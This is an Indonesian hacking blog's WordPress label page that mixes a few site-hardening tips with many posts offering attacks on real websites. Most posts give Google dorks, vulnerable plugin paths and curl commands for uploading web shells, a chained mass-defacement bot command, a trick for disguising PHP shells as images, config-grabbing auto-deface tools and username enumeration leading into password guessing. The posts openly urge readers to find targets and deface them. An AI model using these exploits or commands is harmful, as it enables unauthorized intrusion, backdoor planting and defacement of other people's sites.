Codes Xploit: wordpress
Pages
Showing posts with label wordpress. Show all posts
Showing posts with label wordpress. Show all posts

Scan Source Code Plugin WordPress dengan WPSploit

 
Scan Kode Plugin WordPress dengan WPSploit - Kali ini saya bakal sharing tips seputar WordPress. WPSploit adalah tools yang ditulis dengan bahasa python dan difungsikan untuk melakukan scanning terhadap source code plugins WordPress. Tujuannya tentu saja untuk mengaudit sumber kode tersebut untuk menghindari kode yang memiliki celah.
Read More

Cara Menghilangkan Permalink /blog/ Pada Wordpress

 
Halo teman teman kembali lagi bersama saya, kali ini saya akan memberikan tuturial cara menghilangkan permalink /blog/ pada website bawaan yang baru di install wordpress, permalink tersebut sudah ada sejak teman teman menginstall wordpress, nah teman teman pasti banyak yang ingin tau bagaimana sih cara menghilangkan permalink bawaan wordpress tersebut agar link website kita lebih pendek dan lebih enak ketika di lihat orang.
nah sekarang langsung saja saya akan memberikan bagai mana sih caranya menghilangkan permalink bawaan dari wordpress tersebut.
Berikut cara untuk menghilangkan permalink bawaan pada wordpress :
  1. Pertama kita masuk ke dasbor wordpress website kita.
  2. Setelah masuk ke dasbor kita cek terlebih dahulu ke Pengaturan > Permalink, kita lihat terlebih dahuli permalink bawaannya masih /blog/%postname%/
  3. Oke sekarang kita langsung pergi ke Situs Milik Saya > Admin Jaringan > Situs
  4. Setelah itu pilih situs kalian dan klik Edit
  5. Lalu pilih Pengaturan
  6. kalian scroll kebawah dan cari Permalink Structure lalu di situ ada tulisan /blog/%postname%/ nah kalian ganti menjadi /%postname%/ lalu scroll lagi sampai bawah dan klik Simpan Perubahan

  7. Setelah itu kembali lagi ke Situs Milik Saya > nama domain anda > Dasbor
  8. Setelah masuk ke Dasbor masuk ke Pengaturan > Permalink, dan lihat permalinknya sudah terganti dari /blog/%postname%/ ke /%postname%/
Gimana mudah bukan? begitulah jika kita rajin menggali informasi pasti kita akan dapat dengan mudah memahaminya, sekian dulu dari saya mengenai Cara Menghilangkan Permalink /blog/ Pada Wordpress, semoga artikel saya kali ini dapat bermanfaat bagi anda semua, jika ada yang belum paham bisa di tanyakan di kolom komentar, Terimakasih.

Blokir WordPress User Enumeration dengan Nginx

 
Blokir WordPress User Enumeration dengan Nginx - Memblokir enumerasi username merupakan upaya untuk mencegah terjadinya peretasan di blog atau cms WordPress. Karena jika attacker berhasil mendapatkan daftar username di WordPress, kesempatan mereka untuk melakukan bruteforce semakin terbuka karena sudah mendapatkan daftar username pasti. Nah di kesempatan kali ini saya akan share cara block user enumeration dengan rule nginx, jadi bukan dengan plugins.
Read More

Mengubah Struktur Permalink WordPress di Nginx

 
Mengubah Struktur Permalink WordPress di Nginx - Sebenernya ini sekalian saya jadikan arsip atau cacatan pribadi soalnya tadi hampir sejam ngotak atik nginx rule biar permalink lawas di redirect ke permalink baru. Dan karena di Google gak ketemu tutorialnya (entah karena jarang atau saya yang salah keyword), akhirnya nyoba nyoba sendiri. Beruntuk akhirnya berhasil. ??
Read More

Cara Menyembunyikan Versi WordPress Yang Terinstall

 
Cara Menyembunyikan Versi WordPress Yang Terinstall - Menyembunyikan versi WordPress yang kita install merupakan langkah pencegahan jika sewaktu waktu versi WordPress yang kita install terdapat celah atau bug. Karena scanner seperti wpscan akan mengekspos seluruh celah yang ada jika situs kita menjadi target scan.
Read More

WordPress Plugin Job Manager File Upload

 
Exploit Title: WordPress Plugin Job Manager File Upload
Google Dork: inurl:/wp-content/uploads/job-manager-uploads/
Vuln Path: /jm-ajax/upload_file

Example:
www.target.com/jm-ajax/upload_file/
( Vuln Target )

Exploit:
1. CSRF

2. CURL POST
root # curl -k -F "file=@shell.gif" "http://target.com/jm-ajax/upload_file/"


Upload file anda dengan format .gif/.jpg/.png





Script:
https://pastebin.com/hp0jJr1g [PHP][CLI Based]
https://pastebin.com/FaACEDLg [BASH]


Ayo kawan kita boom zone-h sebelum dir upload di banned lagi.

WordPress Business Directory Plugin File Upload

 

Exploit Title: WordPress Business Directory Plugin File Upload
Author: Jingklong ( Bahari Trouble Maker )



Google Dork: inurl:/wp-content/ inurl:/business-directory-plugin
Vuln Path: /wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

Example Target:
http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload

( Vuln Target )
Exploit:
1. CSRF


2. CURL POST
root # curl -v -k -F "file=@shell.gif" "http://target.com/wp-admin/admin-ajax.php?action=wpbdp-file-field-upload"

Uplod file anda dengan format .gif/.jpg/.png

Hasil upload anda bisa dicari di:
http://target.com//wp-content/uploads/2017/06/shell.gif


Download:
Auto Exploit (BASH): https://pastebin.com/Wk904pU9


Oke, selamat mencari target :D

Disable WP-Cron Untuk Meningkatkan Performa WordPress

 
Kali ini saya akan membahas seputar optimasi WordPress. Yup, seperti judulnya, kali ini kita membahas mengenai cara menonaktifkan wp-cron. Sekedar informasi, wp-cron adalah cronjob bawaan WordPress. Karena fungsinya sebagai ronjob maka file ini digunakan untuk penjadwalan misalnya postingan terjadwal dan lain lain. Lantas kenapa harus dimatikan ?
Read More

Menampilkan Number of Queries dan Page Load Time di WordPress

 
Menampilkan Number of Queries dan Page Load Time di WordPress - Kali ini saya akan membagikan artikel tentang bagaimana cara menampilkan jumlah queries pada CMS WordPress. Barangkali diantara kalian ada yang pernah mengunjungi situs ber-cms WordPress yang menampilkan jumpah queries di footernya dan penasaran bagaimana cara menampilkan Number of Queries seperti itu.
Read More

Menyembunyikan Hints Pada Pesan Error Login WordPress

 
Hallo.. kali ini saya akan membagi sedikit tips mengenai tweak security bagi kalian yang menggunakan cms wordpress. Pada tutorial kali ini kita akan membahas mengenai menghilangkan login hints saat login ke wordpress.
Read More

Menangkal Serangan Brute Force dengan Fail2ban

 
Serangan bruteforce termasuk serangan yang cukup berbahaya apalagi jika attacker dibiarkan bebas melakukan percobaan login hingga ribuan kali. Nah kali ini saya akan menulis tutorial bagaimana menangkal bruteforce menggunakan Fail2ban. Cara kerjanya, fail2ban akan "mengatur" rules di iptables dimana jika sebuah serangan bruteforce terjadi, ip dari penyerang akan diblock permanen atau hingga waktu yang ditentukan. Untuk tutorial ini saya mencoba mengamankan service pada ssh login dan juga login wordpress.
Read More

Full Bot Deface Website

 


Hai semuanya, udah lama banget ngk buat tutor. Gw udh mulai bosen dgn semua ini. Makanya gw pengen share Tools yang menurut gw manteb untuk maen bot - botan..

Cara kerja tools ini ialah dengan mengambil nama domain dari web mirror zone-deface.com, abis itu dapetin ip-nya. nah ipnya kita scan deh di bing. Abis itu kita grab lagi dan kita scan cms apa yg dipakai, terus di save sesuai cmsnya dan di eksploitasi sesuai cms-nya.

Tapi disini gw cuma ada exploit com_media, jce, jdownloads..
untuk yg laen lu cari sendiri ya.

Download Tools disini.
https://drive.google.com/file/d/0B4_2Vn34hkX1V1JYcDFXSlZ2VzQ/view?usp=sharing

command:
php ambil.php attacker_Tu5b0l3d 72 && perl setan.pl ip.htm 31 && php detek.php target_setan.htm && php exploit.php 1-Joomla.htm

catatan:
72 itu ialah page akhir dari attacker_Tu5b0l3d
sesuain sama attacker/team yg mau di grab di http://zone-deface.com/

31 itu page paling akhir pas scan di bing.
klo mau scan sampe 50 page, ubah jadi 51

exploit.php itu isinya ada exploit com_media, jce, jdownloads.
ganti di k.txt dan k.png,
pkoknya harus ada kata - kata hacked.
ganti juga nick di zone-h

1-Joomla.htm itu list joomla site.

Video:
https://www.youtube.com/watch?v=GTocBpZ8eXM

##.
Thx buat bang fyelix yang udah ngasih VPS.

https://www.facebook.com/groups/indoxploitpublic/

How To found uploader in website.

 

*nb: Diperuntukan buat yang udah ada shell

ini cocok banget buat yg pengen menemukan bug baru di plugins atau themes wordpress atau joomla.
bukan menemukan bug baru sih, tapi menemukan file yang ada kata - kata uploadnya melalui shell.

ya daripada kita buka satu - satu dir untuk nyari file upload.
mending pakai tool ini.

ada 2 file yang dipakai disini.

search.php
http://pastebin.com/G1vnLbUt

index.php
http://pastebin.com/nenExAFA

file search.php langsung diupload aja ke websitenya.

file index.php dibuka dan diedit bagian dirnya.

usage:
php index.php http://victim/search.php


video:
https://youtu.be/lniKnyGLxoo

keep share.
join yukk.

Bypassing Extension Shell Backdoor ( jquery file upload exploit )

 
Okee kali ini gua akan bahas gimana caranyaaa mem-bypass shell kitaa, agar bisa terupload di exploit jquery file upload
okee ini dia contoh web nyaaa.

Waktu mau kita upload shell kita dengan ekstensi .php , malah begini:


Nah bagaimana cara ngatasin ituu ?
mungkin ini sedikit kuno yaa , tapi ilmu bagi yang belum tau.

Okeee ginii caranyaaa:
Cukup ubah/rename shell kalian ke ( .php.jpg, .php.gif, .php.png , dan semacamnya tinggal di kembangin aja ) , lalu upload lagi ke target kalian.


dannnnnnnn taraaaaaaaaaaaaa

Kaloo tidak bisa dibuka atau malah nge-download filenyaa mungkin sudah tidak bisa diatasi dengan cara ini lagi :3
Video Tutorial: https://www.youtube.com/watch?v=OxQxbmkhyy0

okeee sekiann dulu tutorial nya semoga bermanfaat ^_^

Salam IndoXploit

WordPress Plugins Tevolution Mass Xploiter

 
Okee gannn, kyknyaa ini exploit lagi booming banget yaaaaa. freshhhh
Thankss buat .
// Res7ock - Aan INCEF buat live targetnyaaaa :D

Ikutin aja kyk di ss gannn.
disini script nyaaaa -> http://pastebin.com/9SCkGP3h

cara pake? :
- masukin ke hosting/shell backdoor
- buka filenyaaa
- happy hackingg ^_^

WordPress U-Design Themes Mass Xploiter

 
Lansunggg aja gannn sedott sourcenyaaaa:
http://pastebin.com/t8PvtP0h


Cara Pake nyaa:
1. Masukin Toolsnya Ke Shell Backdoor / Hosting
2. Masukin Targetnya kyk di SS gan

Ini Google Dorker WP U-Design nya gan biar ga cape cari 1 1:

http://pastebin.com/YFBhSsT6

Salam IndoXploit

Auto Deface Cms Wordpress melalui link Config

 
Kali ini ane pengen share auto ganti title pada site cms wordpress melalui grabber configs.

jadi misalnya lu grab configs dan ternyata nemu banyak config wp. nah lu bisa gunain tool ini biar ngk capek nyelem ke db satu per satu.
ngk deface sih, tapi bisa masuk mirror kok ;v

jadi kita cuma masukin http://blabla.com/configs/

ada 2 file,
1 file untuk websitenya.
1 file untuk kita buka di cmd/terminal.

link_index.php
http://pastebin.com/7jLauxGz

ini nantinya yang kita buka pake cmd/terminal.
php link_index.php

edit filenya ya, terutama untuk link configs, link script link_title_2.php, nickname zone-h, script/kata-kata yang mau diganti di title (harus ada kata hacked)

link_title_2.php
http://pastebin.com/9jT5Qvz5

upload diwebsite yg 1 server sama configsnya.
ngk usah diedit.

POC:





















kenapa cuma ganti title ?
kenapa ngk deface aja ?
wkwk ribet bro, harus login dlu, terus nanem uploader dlu, baru deh kedeface, blm lgi klo wp-login nya disembunyiin.
jadi ganti title aja, karena ganti title cuma ganti di db, blm masuk ke sitenya.

kenapa versi cli ?
karena ini diperuntukan untuk link config wp yg banyak, makanya gw buat versi cli, klo versi website nanti server ngk kuat, alhasil cuma setengah yang kita pepes.

Videonya:https://www.youtube.com/watch?v=CKfRyqcXbwk

#KeepShare

Cara Mengetahui Username Pada Wordpress.

 
kali ini ane pengen share cara mengetahui username pada wordpress.

ane sendiri juga baru tau setelah kemarin ngubek ngubek WPScan.
cukup simple sih.
cuma menambahkan ?author=id
nanti akan muncul username + namenya.

pada kali ini cuma menampilkan username + name dari id 1-10.
kalo mau sampe 20, ubah aja $id yang didalem for.

POC:

jadi ini cuma menampilkan id yg ada username + namenya aja.
setelah mengetahui usernamenya, silahkan di dictionary attack.

script:
http://pastebin.com/AqCmhr2Y

#KeepShare.

Simple Tools For Deface

 

kali ini ane ingin share gabungan dari tools ane.
tinggal klik - klik doang.

Tools:

  1. Jumping (Cuma liat Dir yg readable)
  2. Config grabber Wordpress dan Joomla.
  3. Auto deface site cms joomla. (jadi setelah dapat config yang joomla, mungkin bisa gunain tool ini, dan liat nama domainnya di fitur yang Jumping).
  4. Auto deface site cms Wordpress (sama kayak yang Joomla diatas, tapi ini tidak perlu masukin nama sitenya.)
  5. Auto deface site cms Wordpress 2. (mirip sama yang pertama, tapi ini cuma masukin link confignya aja, jadi setelah pakai Fitur Config, dan dapat Config yang Wordpress. tinggal ditaro aja linknya di form).
  6. Bypass Disabled Functions.
  7. CGI Telnet.


ambil scriptnya disini.
http://pastebin.com/BY5SZjm6

mungkin bisa ditambahin lagi fitur - fiturnya.
keep share.

#.

Config and Auto Deface in Worpdress

 
Config and Auto Deface in Wordpress..

ngk usah capek2 untuk nyari config + masuk ke database, ganti u\p admin, login, nanem shell, deface..

karena semua fitur itu ada di tool ini..
cuma 1x klik...



*nb:
ganti $nick.

klo token ngk ada.. berarti tinggalin aja..
klo token ada + ngk berhasil mepes.. coba lu pake manual..
Subscribe to Newsletter

Popular Posts

© Copyright 2017 Codes Xploit. Designed by Infinite Haxor. Distributed by Infinite Haxor.